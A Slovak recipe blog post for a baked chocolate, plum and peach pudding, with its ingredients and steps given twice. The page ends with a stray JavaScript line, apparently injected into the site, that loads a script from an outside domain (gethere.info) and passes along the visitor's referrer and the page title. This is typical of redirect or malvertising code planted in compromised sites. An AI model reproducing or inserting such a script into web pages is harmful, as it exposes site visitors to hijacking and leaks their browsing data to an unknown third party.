FoodLover

prinášame pôžitok zo zdravého jedla

  • Blog
    • Recepty
      • Homemade
      • Raňajky
      • Šaláty
      • Polievky
      • Hlavné jedlá
      • Sladké potešenia
      • Slané pochúťky
    • Články
      • Zo života
      • Zdravá výzva
        • Jedálniček
        • Blog
        • Pravidlá pre rok 2016
        • O Whole30
  • Čo robím
    • Kurzy varenia
    • Catering
    • Produkty mandlove
  • O mne
    • Kto som
    • Príbeh
  • Kontakt
You are here: Home / Blog / Čoko-slivkovo-broskyňový pečený puding

Čoko-slivkovo-broskyňový pečený puding

30/08/2015 by Martina Leave a Comment

Aj napriek mojim úvodným snahám o ukončenie letnej sezóny sa ukazuje, že leto ešte nepovedalo svoje posledné slovo a stále nás má čím príjemne prekvapiť. Takže tu máme letmý návrat prostredníctvom jednej z letných “hviezd”. Naozaj si to zaslúži, súhlasíte? :)

Takéto nádherné domáce broskyne dostať v Bratislave na “Miletičke”. Návšteva tohoto trhu v lete je pre mňa prívalom čistej a nefalšovanej radosti.

Keďže moja hlava už pracuje v jesennom duchu, spojila som kúsok leta so slivkami a čokoládou a vznikol šťavnatý krémový čokoládový dezert s letno-jesenným nádychom.

Snáď už ani nemusíme zdôrazňovať, že pre nás je dezert jednoducho nevyhnutnosť, ktorú si nechceme, nevieme a ani nemôžeme odoprieť.

plum-peach

Ingrediencie: (forma s priemerom cca 20cm)

  • 150g kvalitnej čokolády
  • 75g kokosového oleja/masla
  • 75g medu/javorového sirupu
  • 2 vajíčka
  • 1 broskyňa
  • asi 4 slivky
  • štipka škorice
  • 1 lyžica mandlí + 1 lyžička kokosového cukru -> pomelieme na karamelovú mrveničku :)

Postup:

    1. Čokoládu s maslom a medom roztopíme nad vodným kúpeľom. Ešte do horúcej zmesi rýchlo zašľaháme vajíčka. Vznikne hustý krém pripomínajúci puding.
    2. Broskyne a slivky si nakrájame na mesiačiky a trošku posypeme škoricou.
    3. Čokoládovú zmes rovnomerne vylejeme do formy vystlanej papierom na pečenie. Poukladáme naň nakrájané ovocie a posypeme mrveničkou.
    4. Pečieme pri 170°C približne 25 minút. Vo vnútri by mal byť koláč čiastočne krémový :).
    5. Podávame teplé, alebo aj vychladené (pôžitok zaručený).

IMG_9726

IMG_9720

Print
Čoko slivkovo-broskyňový pečený puding

Čoko slivkovo-broskyňový pečený puding

*forma s priemerom cca 20cm

Ingredients

  • 150g kvalitnej čokolády
  • 75g kokosového oleja/masla
  • 75g medu/javorového sirupu
  • 2 vajíčka
  • 1 broskyňa
  • asi 4 slivky
  • štipka škorice
  • 1 lyžica mandlí + 1 lyžička kokosového cukru -> pomelieme na karamelovú mrveničku :)

Instructions

  1. Čokoládu s maslom a medom roztopíme nad vodným kúpeľom. Ešte do horúcej zmesi rýchlo zašľaháme vajíčka. Vznikne hustý krém pripomínajúci puding.
  2. Broskyne a slivky si nakrájame na mesiačiky a trošku posypeme škoricou.
  3. Čokoládovú zmes rovnomerne vylejeme do formy vystlanej papierom na pečenie. Poukladáme naň nakrájané ovocie a posypeme mrveničkou.
  4. Pečieme pri 170°C približne 25 minút. Vo vnútri by mal byť koláč čiastočne krémový :).
  5. Podávame teplé, alebo aj vychladené (pôžitok zaručený).
5.0

takto krémový.. :))

takto krémový.. :))

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;